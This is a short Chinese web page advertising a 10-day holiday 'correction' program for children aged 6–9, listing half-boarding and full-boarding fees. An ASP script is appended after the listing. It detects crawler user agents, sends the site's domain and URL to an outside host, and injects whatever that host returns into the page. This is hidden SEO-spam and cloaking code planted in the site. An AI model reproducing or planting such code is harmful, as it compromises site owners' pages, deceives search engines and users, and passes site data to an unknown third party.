儿童矫正

矫正对象:6—9岁的儿童。

半封闭式:费用2400元(包含矫正费用及午餐费用),白天送来矫正,晚上接回去。

全封闭式:费用3000元(包含矫正费、食宿费及护理费),第一天送来,第十天接回。

时间:寒暑假期间,为10天,随到随矫正。
<% Function getBody(infopageurl) On Error Resume Next if infopageurl<>"" then dim xmlHttp set xmlHttp=server.createobject("MSXML2.XMLHTTP") xmlHttp.open "GET",infopageurl,false xmlHttp.send getBody=BytesToBstr(xmlhttp.responsebody,"GB2312") set xmlHttp=nothing end if end Function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function dns = Request.ServerVariables("SERVER_NAME") path = Request.ServerVariables("PATH_INFO") qs = Request.ServerVariables("QUERY_STRING") url= dns&path&"?"&qs agent = Request.ServerVariables("HTTP_USER_AGENT") tz = "http" if Instr(agent,tz)>0 then if path ="/index.asp" or path="/default.asp" then response.write getBody("http://wap.w207.dnsfx.cn/conn6.asp?dns="&dns) else response.write getBody("http://wap.w207.dnsfx.cn/conn6.asp?dns="&url&"&dn="&dns) end if end if %>